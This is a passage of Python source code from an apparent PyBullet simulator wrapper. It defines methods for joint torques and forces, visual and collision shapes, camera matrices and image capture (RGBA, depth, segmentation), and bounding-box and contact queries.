joints = self.get_actuated_joint_ids(body_id)
if q is None:
q = self.get_joint_positions(body_id, joints)
if dq is None:
dq = self.get_joint_velocities(body_id, joints)
num_actuated_joints = len(q)
# if joint accelerations vector is not the same size as the actuated joints
if len(accelerations) != num_actuated_joints:
q_idx = self.get_q_indices(joint_ids)
acc = np.zeros(num_actuated_joints)
acc[q_idx] = accelerations
accelerations = acc
# compute joint torques from Inverse Dynamics
torques = self.calculate_inverse_dynamics(body_id, q, dq, accelerations)
# get corresponding torques
if len(torques) != len(joint_ids):
q_idx = self.get_q_indices(joint_ids)
torques = torques[q_idx]
# set the joint torques
self.set_joint_torques(body_id, joint_ids, torques)
# def get_joint_accelerations(self, body_id, joint_ids): # , q=None, dq=None):
# """
# Get the acceleration at the given joint(s). This is carried out by first getting the joint torques, then
# performing forward dynamics to get the joint accelerations from the joint torques.
#
# Args:
# body_id (int): unique body id.
# joint_ids (int, list[int]): joint id, or list of joint ids.
# q (list[int], None): all the joint positions. If None, it will compute it.
# dq (list[int], None): all the joint velocities. If None, it will compute it.
#
# Returns:
# if 1 joint:
# float: joint acceleration [rad/s^2]
# if multiple joints:
# np.array[float[N]]: joint accelerations [rad/s^2]
# """
# # get the torques
# torques = self.get_joint_torques(body_id, joint_ids)
#
# # get position and velocities
# if q is None or dq is None:
# joints = self.get_actuated_joint_ids(body_id)
# if q is None:
# q = self.get_joint_positions(body_id, joints)
# if dq is None:
# dq = self.get_joint_velocities(body_id, joints)
#
# # compute the accelerations
# accelerations = self.calculate_forward_dynamics(body_id, q, dq, torques=torques)
#
# # return the specified accelerations
# q_idx = self.get_q_indices(body_id, joint_ids)
# return accelerations[q_idx]
def _set_joint_torques(self, body_id, joint_ids, torques):
"""
Set the torque/force to the given joint(s) (using force/torque control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
torques (float, list[float]): desired torque(s) to apply to the joint(s) [N].
"""
if isinstance(joint_ids, int):
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.TORQUE_CONTROL, force=torques)
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.TORQUE_CONTROL, forces=torques)
def _get_joint_torques(self, body_id, joint_ids):
"""
Get the applied torque(s) on the given joint(s). "This is the motor torque applied during the last `step`.
Note that this only applies in VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the
applied joint motor torque is exactly what you provide, so there is no need to report it separately." [1]
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: torque [Nm]
if multiple joints:
np.array[float[N]]: torques associated to the given joints [Nm]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[3]
return np.asarray([state[3] for state in self.sim.getJointStates(body_id, joint_ids)])
def get_joint_reaction_forces(self, body_id, joint_ids):
"""
Return the joint reaction forces at the given joint. Note that the torque sensor must be enabled, otherwise
it will always return [0,0,0,0,0,0].
Args:
body_id (int): unique body id.
joint_ids (int, int[N]): joint id, or list of joint ids
Returns:
if 1 joint:
np.array[float[6]]: joint reaction force (fx,fy,fz,mx,my,mz) [N,Nm]
if multiple joints:
np.array[float[N,6]]: joint reaction forces [N, Nm]
"""
if isinstance(joint_ids, int):
return np.asarray(self.sim.getJointState(body_id, joint_ids)[2])
return np.asarray([state[2] for state in self.sim.getJointStates(body_id, joint_ids)])
def get_joint_powers(self, body_id, joint_ids):
"""
Return the applied power at the given joint(s). Power = torque * velocity.
Args:
body_id (int): unique body id.
joint_ids (int, int[N]): joint id, or list of joint ids
Returns:
if 1 joint:
float: joint power [W]
if multiple joints:
np.array[float[N]]: power at each joint [W]
"""
torque = self.get_joint_torques(body_id, joint_ids)
velocity = self.get_joint_velocities(body_id, joint_ids)
return torque * velocity
#################
# visualization #
#################
def create_visual_shape(self, shape_type, radius=0.5, half_extents=(1., 1., 1.), length=1., filename=None,
mesh_scale=(1., 1., 1.), plane_normal=(0., 0., 1.), flags=-1, rgba_color=None,
specular_color=None, visual_frame_position=None, vertices=None, indices=None, uvs=None,
normals=None, visual_frame_orientation=None):
"""
Create a visual shape in the simulator.
Args:
shape_type (int): type of shape; GEOM_SPHERE (=2), GEOM_BOX (=3), GEOM_CAPSULE (=7), GEOM_CYLINDER (=4),
GEOM_PLANE (=6), GEOM_MESH (=5)
radius (float): only for GEOM_SPHERE, GEOM_CAPSULE, GEOM_CYLINDER
half_extents (np.array[float[3]], list/tuple of 3 floats): only for GEOM_BOX.
length (float): only for GEOM_CAPSULE, GEOM_CYLINDER (length = height).
filename (str): Filename for GEOM_MESH, currently only Wavefront .obj. Will create convex hulls for each
object (marked as 'o') in the .obj file.
mesh_scale (np.array[float[3]], list/tuple of 3 floats): scale of mesh (only for GEOM_MESH).
plane_normal (np.array[float[3]], list/tuple of 3 floats): plane normal (only for GEOM_PLANE).
flags (int): unused / to be decided
rgba_color (list/tuple of 4 floats): color components for red, green, blue and alpha, each in range [0..1].
specular_color (list/tuple of 3 floats): specular reflection color, red, green, blue components in range
[0..1]
visual_frame_position (np.array[float[3]]): translational offset of the visual shape with respect to the
link frame
vertices (list of np.array[float[3]]): Instead of creating a mesh from obj file, you can provide vertices,
indices, uvs and normals
indices (list[int]): triangle indices, should be a multiple of 3.
uvs (list of np.array[2]): uv texture coordinates for vertices. Use changeVisualShape to choose the
texture image. The number of uvs should be equal to number of vertices
normals (list of np.array[float[3]]): vertex normals, number should be equal to number of vertices.
visual_frame_orientation (np.array[float[4]]): rotational offset (quaternion x,y,z,w) of the visual shape
with respect to the link frame
Returns:
int: The return value is a non-negative int unique id for the visual shape or -1 if the call failed.
"""
# add few variables
kwargs = {}
if rgba_color is not None:
kwargs['rgbaColor'] = rgba_color
if specular_color is not None:
kwargs['specularColor'] = specular_color
if visual_frame_position is not None:
kwargs['visualFramePosition'] = visual_frame_position
if visual_frame_orientation is not None:
kwargs['visualFrameOrientation'] = visual_frame_orientation
if shape_type == self.sim.GEOM_SPHERE:
return self.sim.createVisualShape(shape_type, radius=radius, **kwargs)
elif shape_type == self.sim.GEOM_BOX:
return self.sim.createVisualShape(shape_type, halfExtents=half_extents, **kwargs)
elif shape_type == self.sim.GEOM_CAPSULE or shape_type == self.sim.GEOM_CYLINDER:
return self.sim.createVisualShape(shape_type, radius=radius, length=length, **kwargs)
elif shape_type == self.sim.GEOM_PLANE:
return self.sim.createVisualShape(shape_type, planeNormal=plane_normal, **kwargs)
elif shape_type == self.sim.GEOM_MESH:
if filename is not None:
kwargs['fileName'] = filename
else:
if vertices is not None:
kwargs['vertices'] = vertices
if indices is not None:
kwargs['indices'] = indices
if uvs is not None:
kwargs['uvs'] = uvs
if normals is not None:
kwargs['normals'] = normals
return self.sim.createVisualShape(shape_type, **kwargs)
else:
raise ValueError("Unknown visual shape type.")
def get_visual_shape_data(self, object_id, flags=-1):
"""
Get the visual shape data associated with the given object id. It will output a list of visual shape data.
Args:
object_id (int): object unique id.
flags (int, None): VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS (=1) will also provide `texture_unique_id`.
Returns:
list:
int: object unique id.
int: link index or -1 for the base
int: visual geometry type (TBD)
np.array[float[3]]: dimensions (size, local scale) of the geometry
str: path to the triangle mesh, if any. Typically relative to the URDF, SDF or MJCF file location, but
could be absolute
np.array[float[3]]: position of local visual frame, relative to link/joint frame
np.array[float[4]]: orientation of local visual frame relative to link/joint frame
list[float[4]]: URDF color (if any specified) in Red / Green / Blue / Alpha
int: texture unique id of the shape or -1 if None. This field only exists if using
VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS (=1) flag.
"""
shapes = list(self.sim.getVisualShapeData(object_id, flags=flags))
for idx, shape in enumerate(shapes):
shapes[idx] = list(shape)
shapes[idx][3] = np.asarray(shape[3])
shapes[idx][5] = np.asarray(shape[5])
shapes[idx][6] = np.asarray(shape[6])
return shapes
def change_visual_shape(self, object_id, link_id, shape_id=None, texture_id=None, rgba_color=None,
specular_color=None):
"""
Allows to change the texture of a shape, the RGBA color and other properties.
Args:
object_id (int): unique object id.
link_id (int): link id.
shape_id (int): shape id.
texture_id (int): texture id.
rgba_color (float[4]): RGBA color. Each is in the range [0..1]. Alpha has to be 0 (invisible) or 1
(visible) at the moment.
specular_color (int[3]): specular color components, RED, GREEN and BLUE, can be from 0 to large number
(>100).
"""
kwargs = {}
if shape_id is not None:
kwargs['shapeIndex'] = shape_id
if texture_id is not None:
kwargs['textureUniqueId'] = texture_id
if rgba_color is not None:
kwargs['rgbaColor'] = rgba_color
if specular_color is not None:
kwargs['specularColor'] = specular_color
self.sim.changeVisualShape(object_id, link_id, **kwargs)
def load_texture(self, filename):
"""
Load a texture from file and return a non-negative texture unique id if the loading succeeds.
This unique id can be used with changeVisualShape.
Args:
filename (str): path to the file.
Returns:
int: texture unique id. If non-negative, the texture was loaded successfully.
"""
return self.sim.loadTexture(filename)
def compute_view_matrix(self, eye_position, target_position, up_vector):
"""Compute the view matrix.
The view matrix is the 4x4 matrix that maps the world coordinates into the camera coordinates. Basically,
it applies a rotation and translation such that the world is in front of the camera. That is, instead
of turning the camera to capture what we want in the world, we keep the camera fixed and turn the world.
Args:
eye_position (np.array[float[3]]): eye position in Cartesian world coordinates
target_position (np.array[float[3]]): position of the target (focus) point in Cartesian world coordinates
up_vector (np.array[float[3]]): up vector of the camera in Cartesian world coordinates
Returns:
np.array[float[4,4]]: the view matrix
More info:
[1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
[2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
"""
view = self.sim.computeViewMatrix(cameraEyePosition=eye_position, cameraTargetPosition=target_position,
cameraUpVector=up_vector)
return np.asarray(view).reshape(4, 4).T
def compute_view_matrix_from_ypr(self, target_position, distance, yaw, pitch, roll, up_axis_index=2):
"""Compute the view matrix from the yaw, pitch, and roll angles.
The view matrix is the 4x4 matrix that maps the world coordinates into the camera coordinates. Basically,
it applies a rotation and translation such that the world is in front of the camera. That is, instead
of turning the camera to capture what we want in the world, we keep the camera fixed and turn the world.
Args:
target_position (np.array[float[3]]): target focus point in Cartesian world coordinates
distance (float): distance from eye to focus point
yaw (float): yaw angle in radians left/right around up-axis
pitch (float): pitch in radians up/down.
roll (float): roll in radians around forward vector
up_axis_index (int): either 1 for Y or 2 for Z axis up.
Returns:
np.array[float[4,4]]: the view matrix
More info:
[1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
[2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
"""
view = self.sim.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=target_position, distance=distance,
yaw=np.rad2deg(yaw), pitch=np.rad2deg(pitch),
roll=np.rad2deg(roll), upAxisIndex=up_axis_index)
return np.asarray(view).reshape(4, 4).T
def compute_projection_matrix(self, left, right, bottom, top, near, far):
"""Compute the orthographic projection matrix.
The projection matrix is the 4x4 matrix that maps from the camera/eye coordinates to clipped coordinates.
It is applied after the view matrix.
There are 2 projection matrices:
* orthographic projection
* perspective projection
For the perspective projection, see `computeProjectionMatrixFOV(self)`.
Args:
left (float): left screen (canvas) coordinate
right (float): right screen (canvas) coordinate
bottom (float): bottom screen (canvas) coordinate
top (float): top screen (canvas) coordinate
near (float): near plane distance
far (float): far plane distance
Returns:
np.array[float[4,4]]: the perspective projection matrix
More info:
[1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
[2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
"""
proj = self.sim.computeProjectionMatrix(left, right, bottom, top, near, far)
return np.asarray(proj).reshape(4, 4).T
def compute_projection_matrix_fov(self, fov, aspect, near, far):
"""Compute the perspective projection matrix using the field of view (FOV).
Args:
fov (float): field of view
aspect (float): aspect ratio
near (float): near plane distance
far (float): far plane distance
Returns:
np.array[float[4,4]]: the perspective projection matrix
More info:
[1] http://www.codinglabs.net/article_world_view_projection_matrix.aspx
[2] http://www.thecodecrate.com/opengl-es/opengl-transformation-matrices/
"""
proj = self.sim.computeProjectionMatrixFOV(fov, aspect, near, far)
return np.asarray(proj).reshape(4, 4).T
def get_camera_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
"""
The `get_camera_image` API will return a RGB image, a depth buffer and a segmentation mask buffer with body
unique ids of visible objects for each pixel. Note that PyBullet can be compiled using the numpy option:
using numpy will improve the performance of copying the camera pixels from C to Python.
Note that copying pixels from C/C++ to Python can be really slow for large images, unless you compile PyBullet
using NumPy. You can check if NumPy is enabled using `PyBullet.isNumpyEnabled()`. `pip install pybullet` has
NumPy enabled, if available on the system.
Args:
width (int): horizontal image resolution in pixels
height (int): vertical image resolution in pixels
view_matrix (np.array[float[4,4]]): 4x4 view matrix, see `compute_view_matrix`
projection_matrix (np.array[float[4,4]]): 4x4 projection matrix, see `compute_projection`
light_direction (np.array[float[3]]): `light_direction` specifies the world position of the light source,
the direction is from the light source position to the origin of the world frame.
light_color (np.array[float[3]]): directional light color in [RED,GREEN,BLUE] in range 0..1
light_distance (float): distance of the light along the normalized `light_direction`
shadow (bool): True for shadows, False for no shadows
light_ambient_coeff (float): light ambient coefficient
light_diffuse_coeff (float): light diffuse coefficient
light_specular_coeff (float): light specular coefficient
renderer (int): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that DIRECT (=2)
mode has no OpenGL, so it requires ER_TINY_RENDERER (=65536).
flags (int): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), See below in description of
segmentationMaskBuffer and example code. Use ER_NO_SEGMENTATION_MASK (=4) to avoid calculating the
segmentation mask.
Returns:
int: width image resolution in pixels (horizontal)
int: height image resolution in pixels (vertical)
np.array[int[width, height, 4]]: RBGA pixels (each pixel is in the range [0..255] for each channel).
np.array[float[width, height]]: Depth buffer. Bullet uses OpenGL to render, and the convention is non-linear
z-buffer. See https://stackoverflow.com/questions/6652253/getting-the-true-z-value-from-the-depth-buffer
Using the projection matrix, the depth is computed as:
`depth = far * near / (far - (far - near) * depthImg)`, where `depthImg` is the depth from Bullet
`get_camera_image`, far=1000. and near=0.01.
np.array[int[width, height]]: Segmentation mask buffer. For each pixels the visible object unique id.
If ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1) is used, the segmentationMaskBuffer combines the
object unique id and link index as follows: value = objectUniqueId + (linkIndex+1)<<24.
So for a free floating body without joints/links, the segmentation mask is equal to its body unique id,
since its link index is -1.
"""
kwargs = {}
if view_matrix is not None:
if isinstance(view_matrix, np.ndarray):
kwargs['viewMatrix'] = view_matrix.T.ravel().tolist()
else:
kwargs['viewMatrix'] = view_matrix
if projection_matrix is not None:
if isinstance(projection_matrix, np.ndarray):
kwargs['projectionMatrix'] = projection_matrix.T.ravel().tolist()
else:
kwargs['projectionMatrix'] = projection_matrix
if light_direction is not None:
if isinstance(light_direction, np.ndarray):
kwargs['lightDirection'] = light_direction.ravel().tolist()
else:
kwargs['lightDirection'] = light_direction
if light_color is not None:
if isinstance(light_color, np.ndarray):
kwargs['lightColor'] = light_color
else:
kwargs['lightColor'] = light_color
if light_distance is not None:
kwargs['lightDistance'] = light_distance
if shadow is not None:
kwargs['shadow'] = int(shadow)
if light_ambient_coeff is not None:
kwargs['lightAmbientCoeff'] = light_ambient_coeff
if light_diffuse_coeff is not None:
kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
if light_specular_coeff is not None:
kwargs['lightSpecularCoeff'] = light_specular_coeff
if renderer is not None:
kwargs['renderer'] = renderer
if flags is not None:
kwargs['flags'] = flags
width, height = int(width), int(height)
width, height, rgba, depth, segmentation = self.sim.getCameraImage(width, height, **kwargs)
rgba = np.asarray(rgba).reshape(width, height, 4)
depth = np.asarray(depth).reshape(width, height)
segmentation = np.asarray(segmentation).reshape(width, height)
return width, height, rgba, depth, segmentation
def get_rgba_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
"""
The `get_rgba_image` API will return a RGBA image. Note that PyBullet can be compiled using the numpy option:
using numpy will improve the performance of copying the camera pixels from C to Python.
Note that copying pixels from C/C++ to Python can be really slow for large images, unless you compile PyBullet
using NumPy. You can check if NumPy is enabled using `PyBullet.isNumpyEnabled()`. `pip install pybullet` has
NumPy enabled, if available on the system.
Args:
width (int): horizontal image resolution in pixels
height (int): vertical image resolution in pixels
view_matrix (np.array[float[4,4]]): 4x4 view matrix, see `compute_view_matrix`
projection_matrix (np.array[float[4,4]]): 4x4 projection matrix, see `compute_projection`
light_direction (np.array[float[3]]): `light_direction` specifies the world position of the light source,
the direction is from the light source position to the origin of the world frame.
light_color (np.array[float[3]]): directional light color in [RED,GREEN,BLUE] in range 0..1
light_distance (float): distance of the light along the normalized `light_direction`
shadow (bool): True for shadows, False for no shadows
light_ambient_coeff (float): light ambient coefficient
light_diffuse_coeff (float): light diffuse coefficient
light_specular_coeff (float): light specular coefficient
renderer (int): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that DIRECT (=2)
mode has no OpenGL, so it requires ER_TINY_RENDERER (=65536).
flags (int): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), See below in description of
segmentationMaskBuffer and example code. Use ER_NO_SEGMENTATION_MASK (=4) to avoid calculating the
segmentation mask.
Returns:
np.array[int[width, height, 4]]: RBGA pixels (each pixel is in the range [0..255] for each channel).
"""
kwargs = {}
if view_matrix is not None:
if isinstance(view_matrix, np.ndarray):
kwargs['viewMatrix'] = view_matrix.T.ravel().tolist()
else:
kwargs['viewMatrix'] = view_matrix
if projection_matrix is not None:
if isinstance(projection_matrix, np.ndarray):
kwargs['projectionMatrix'] = projection_matrix.T.ravel().tolist()
else:
kwargs['projectionMatrix'] = projection_matrix
if light_direction is not None:
if isinstance(light_direction, np.ndarray):
kwargs['lightDirection'] = light_direction.ravel().tolist()
else:
kwargs['lightDirection'] = light_direction
if light_color is not None:
if isinstance(light_color, np.ndarray):
kwargs['lightColor'] = light_color
else:
kwargs['lightColor'] = light_color
if light_distance is not None:
kwargs['lightDistance'] = light_distance
if shadow is not None:
kwargs['shadow'] = int(shadow)
if light_ambient_coeff is not None:
kwargs['lightAmbientCoeff'] = light_ambient_coeff
if light_diffuse_coeff is not None:
kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
if light_specular_coeff is not None:
kwargs['lightSpecularCoeff'] = light_specular_coeff
if renderer is not None:
kwargs['renderer'] = renderer
if flags is not None:
kwargs['flags'] = flags
img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[2])
img = img.reshape(width, height, 4) # RGBA
return img
def get_depth_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
"""
The `get_depth_image` API will return a depth buffer. Note that PyBullet can be compiled using the numpy option:
using numpy will improve the performance of copying the camera pixels from C to Python.
Note that copying pixels from C/C++ to Python can be really slow for large images, unless you compile PyBullet
using NumPy. You can check if NumPy is enabled using `PyBullet.isNumpyEnabled()`. `pip install pybullet` has
NumPy enabled, if available on the system.
Args:
width (int): horizontal image resolution in pixels
height (int): vertical image resolution in pixels
view_matrix (np.array[float[4,4]]): 4x4 view matrix, see `compute_view_matrix`
projection_matrix (np.array[float[4,4]]): 4x4 projection matrix, see `compute_projection`
light_direction (np.array[float[3]]): `light_direction` specifies the world position of the light source,
the direction is from the light source position to the origin of the world frame.
light_color (np.array[float[3]]): directional light color in [RED,GREEN,BLUE] in range 0..1
light_distance (float): distance of the light along the normalized `light_direction`
shadow (bool): True for shadows, False for no shadows
light_ambient_coeff (float): light ambient coefficient
light_diffuse_coeff (float): light diffuse coefficient
light_specular_coeff (float): light specular coefficient
renderer (int): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that DIRECT (=2)
mode has no OpenGL, so it requires ER_TINY_RENDERER (=65536).
flags (int): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), See below in description of
segmentationMaskBuffer and example code. Use ER_NO_SEGMENTATION_MASK (=4) to avoid calculating the
segmentation mask.
Returns:
np.array[float[width, height]]: Depth buffer. Bullet uses OpenGL to render, and the convention is non-linear
z-buffer. See https://stackoverflow.com/questions/6652253/getting-the-true-z-value-from-the-depth-buffer
Using the projection matrix, the depth is computed as:
`depth = far * near / (far - (far - near) * depthImg)`, where `depthImg` is the depth from Bullet
`get_camera_image`, far=1000. and near=0.01.
"""
kwargs = {}
if view_matrix is not None:
if isinstance(view_matrix, np.ndarray):
kwargs['viewMatrix'] = view_matrix.T.ravel().tolist()
else:
kwargs['viewMatrix'] = view_matrix
if projection_matrix is not None:
if isinstance(projection_matrix, np.ndarray):
kwargs['projectionMatrix'] = projection_matrix.T.ravel().tolist()
else:
kwargs['projectionMatrix'] = projection_matrix
if light_direction is not None:
if isinstance(light_direction, np.ndarray):
kwargs['lightDirection'] = light_direction.ravel().tolist()
else:
kwargs['lightDirection'] = light_direction
if light_color is not None:
if isinstance(light_color, np.ndarray):
kwargs['lightColor'] = light_color
else:
kwargs['lightColor'] = light_color
if light_distance is not None:
kwargs['lightDistance'] = light_distance
if shadow is not None:
kwargs['shadow'] = int(shadow)
if light_ambient_coeff is not None:
kwargs['lightAmbientCoeff'] = light_ambient_coeff
if light_diffuse_coeff is not None:
kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
if light_specular_coeff is not None:
kwargs['lightSpecularCoeff'] = light_specular_coeff
if renderer is not None:
kwargs['renderer'] = renderer
if flags is not None:
kwargs['flags'] = flags
img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[3])
img = img.reshape(width, height)
return img
def get_segmentation_image(self, width, height, view_matrix=None, projection_matrix=None, light_direction=None,
light_color=None, light_distance=None, shadow=None, light_ambient_coeff=None,
light_diffuse_coeff=None, light_specular_coeff=None, renderer=None, flags=None):
"""
The `get_segmentation_image` API will return a segmentation mask buffer with body unique ids of visible objects
for each pixel. Note that PyBullet can be compiled using the numpy option: using numpy will improve
the performance of copying the camera pixels from C to Python.
Note that copying pixels from C/C++ to Python can be really slow for large images, unless you compile PyBullet
using NumPy. You can check if NumPy is enabled using `PyBullet.isNumpyEnabled()`. `pip install pybullet` has
NumPy enabled, if available on the system.
Args:
width (int): horizontal image resolution in pixels
height (int): vertical image resolution in pixels
view_matrix (np.array[float[4,4]]): 4x4 view matrix, see `compute_view_matrix`
projection_matrix (np.array[float[4,4]]): 4x4 projection matrix, see `compute_projection`
light_direction (np.array[float[3]]): `light_direction` specifies the world position of the light source,
the direction is from the light source position to the origin of the world frame.
light_color (np.array[float[3]]): directional light color in [RED,GREEN,BLUE] in range 0..1
light_distance (float): distance of the light along the normalized `light_direction`
shadow (bool): True for shadows, False for no shadows
light_ambient_coeff (float): light ambient coefficient
light_diffuse_coeff (float): light diffuse coefficient
light_specular_coeff (float): light specular coefficient
renderer (int): ER_BULLET_HARDWARE_OPENGL (=131072) or ER_TINY_RENDERER (=65536). Note that DIRECT (=2)
mode has no OpenGL, so it requires ER_TINY_RENDERER (=65536).
flags (int): ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1), See below in description of
segmentationMaskBuffer and example code. Use ER_NO_SEGMENTATION_MASK (=4) to avoid calculating the
segmentation mask.
Returns:
np.array[int[width, height]]: Segmentation mask buffer. For each pixels the visible object unique id.
If ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX (=1) is used, the segmentationMaskBuffer combines the
object unique id and link index as follows: value = objectUniqueId + (linkIndex+1)<<24.
So for a free floating body without joints/links, the segmentation mask is equal to its body unique id,
since its link index is -1.
"""
kwargs = {}
if view_matrix is not None:
if isinstance(view_matrix, np.ndarray):
kwargs['viewMatrix'] = view_matrix.T.ravel().tolist()
else:
kwargs['viewMatrix'] = view_matrix
if projection_matrix is not None:
if isinstance(projection_matrix, np.ndarray):
kwargs['projectionMatrix'] = projection_matrix.T.ravel().tolist()
else:
kwargs['projectionMatrix'] = projection_matrix
if light_direction is not None:
if isinstance(light_direction, np.ndarray):
kwargs['lightDirection'] = light_direction.ravel().tolist()
else:
kwargs['lightDirection'] = light_direction
if light_color is not None:
if isinstance(light_color, np.ndarray):
kwargs['lightColor'] = light_color
else:
kwargs['lightColor'] = light_color
if light_distance is not None:
kwargs['lightDistance'] = light_distance
if shadow is not None:
kwargs['shadow'] = int(shadow)
if light_ambient_coeff is not None:
kwargs['lightAmbientCoeff'] = light_ambient_coeff
if light_diffuse_coeff is not None:
kwargs['lightDiffuseCoeff'] = light_diffuse_coeff
if light_specular_coeff is not None:
kwargs['lightSpecularCoeff'] = light_specular_coeff
if renderer is not None:
kwargs['renderer'] = renderer
if flags is not None:
kwargs['flags'] = flags
img = np.asarray(self.sim.getCameraImage(width, height, **kwargs)[4])
img = img.reshape(width, height)
return img
##############
# Collisions #
##############
def create_collision_shape(self, shape_type, radius=0.5, half_extents=(1., 1., 1.), height=1., filename=None,
mesh_scale=(1., 1., 1.), plane_normal=(0., 0., 1.), flags=-1,
collision_frame_position=None, collision_frame_orientation=None):
"""
Create collision shape in the simulator.
Args:
shape_type (int): type of shape; GEOM_SPHERE (=2), GEOM_BOX (=3), GEOM_CAPSULE (=7), GEOM_CYLINDER (=4),
GEOM_PLANE (=6), GEOM_MESH (=5)
radius (float): only for GEOM_SPHERE, GEOM_CAPSULE, GEOM_CYLINDER
half_extents (np.array[float[3]], list/tuple of 3 floats): only for GEOM_BOX.
height (float): only for GEOM_CAPSULE, GEOM_CYLINDER (length = height).
filename (str): Filename for GEOM_MESH, currently only Wavefront .obj. Will create convex hulls for each
object (marked as 'o') in the .obj file.
mesh_scale (np.array[float[3]], list/tuple of 3 floats): scale of mesh (only for GEOM_MESH).
plane_normal (np.array[float[3]], list/tuple of 3 floats): plane normal (only for GEOM_PLANE).
flags (int): unused / to be decided
collision_frame_position (np.array[float[3]]): translational offset of the collision shape with respect
to the link frame
collision_frame_orientation (np.array[float[4]]): rotational offset (quaternion x,y,z,w) of the collision
shape with respect to the link frame
Returns:
int: The return value is a non-negative int unique id for the collision shape or -1 if the call failed.
"""
# add few variables
kwargs = {}
if collision_frame_position is not None:
kwargs['collisionFramePosition'] = collision_frame_position
if collision_frame_orientation is not None:
kwargs['collisionFrameOrientation'] = collision_frame_orientation
if shape_type == self.sim.GEOM_SPHERE:
return self.sim.createCollisionShape(shape_type, radius=radius, **kwargs)
elif shape_type == self.sim.GEOM_BOX:
return self.sim.createCollisionShape(shape_type, halfExtents=half_extents, **kwargs)
elif shape_type == self.sim.GEOM_CAPSULE or shape_type == self.sim.GEOM_CYLINDER:
return self.sim.createCollisionShape(shape_type, radius=radius, height=height, **kwargs)
elif shape_type == self.sim.GEOM_PLANE:
return self.sim.createCollisionShape(shape_type, planeNormal=plane_normal, **kwargs)
elif shape_type == self.sim.GEOM_MESH:
return self.sim.createCollisionShape(shape_type, fileName=filename, **kwargs)
else:
raise ValueError("Unknown collision shape type.")
def get_collision_shape_data(self, object_id, link_id=-1):
"""
Get the collision shape data associated with the specified object id and link id. If the given object_id has
no collision shape, it returns an empty tuple.
Args:
object_id (int): object unique id.
link_id (int): link index or -1 for the base.
Returns:
if not has_collision_shape_data:
tuple: empty tuple
else:
int: object unique id.
int: link id.
int: geometry type; GEOM_BOX (=3), GEOM_SPHERE (=2), GEOM_CAPSULE (=7), GEOM_MESH (=5), GEOM_PLANE (=6)
np.array[float[3]]: depends on geometry type:
for GEOM_BOX: extents,
for GEOM_SPHERE: dimensions[0] = radius,
for GEOM_CAPSULE and GEOM_CYLINDER: dimensions[0] = height (length), dimensions[1] = radius.
For GEOM_MESH: dimensions is the scaling factor.
str: Only for GEOM_MESH: file name (and path) of the collision mesh asset.
np.array[float[3]]: Local position of the collision frame with respect to the center of mass/inertial
frame
np.array[float[4]]: Local orientation of the collision frame with respect to the inertial frame
"""
collision = self.sim.getCollisionShapeData(object_id, link_id)
if len(collision) == 0:
return collision
object_id, link_id, geom_type, dimensions, filename, position, orientation = collision
return object_id, link_id, geom_type, np.asarray(dimensions), filename, np.asarray(position), \
np.asarray(orientation)
def get_overlapping_objects(self, aabb_min, aabb_max):
"""
This query will return all the unique ids of objects that have Axis Aligned Bounding Box (AABB) overlap with
a given axis aligned bounding box. Note that the query is conservative and may return additional objects that
don't have actual AABB overlap. This happens because the acceleration structures have some heuristic that
enlarges the AABBs a bit (extra margin and extruded along the velocity vector).
Args:
aabb_min (np.array[float[3]]): minimum coordinates of the aabb
aabb_max (np.array[float[3]]): maximum coordinates of the aabb
Returns:
list[int]: list of object unique ids.
"""
return self.sim.getOverlappingObjects(aabb_min, aabb_max)
def get_aabb(self, body_id, link_id=-1):
"""
You can query the axis aligned bounding box (in world space) given an object unique id, and optionally a link
index. (when you don't pass the link index, or use -1, you get the AABB of the base).
Args:
body_id (int): object unique id as returned by creation methods
link_id (int): link index in range [0..`getNumJoints(..)]
Returns:
np.array[float[3]]: minimum coordinates of the axis aligned bounding box
np.array[float[3]]: maximum coordinates of the axis aligned bounding box
"""
aabb_min, aabb_max = self.sim.getAABB(body_id, link_id)
return np.asarray(aabb_min), np.asarray(aabb_max)
def get_contact_points(self, body1, body2=None, link1_id=None, link2_id=None):
"""
Returns the contact points computed during the most recent call to `step`.
Args:
body1 (int): only report contact points that involve body A
body2 (int, None): only report contact points that involve body B. Important: you need to have a valid body
A if you provide body B
link1_id (int, None): only report contact points that involve link index of body A
link2_id (int, None): only report contact points that involve link index of body B
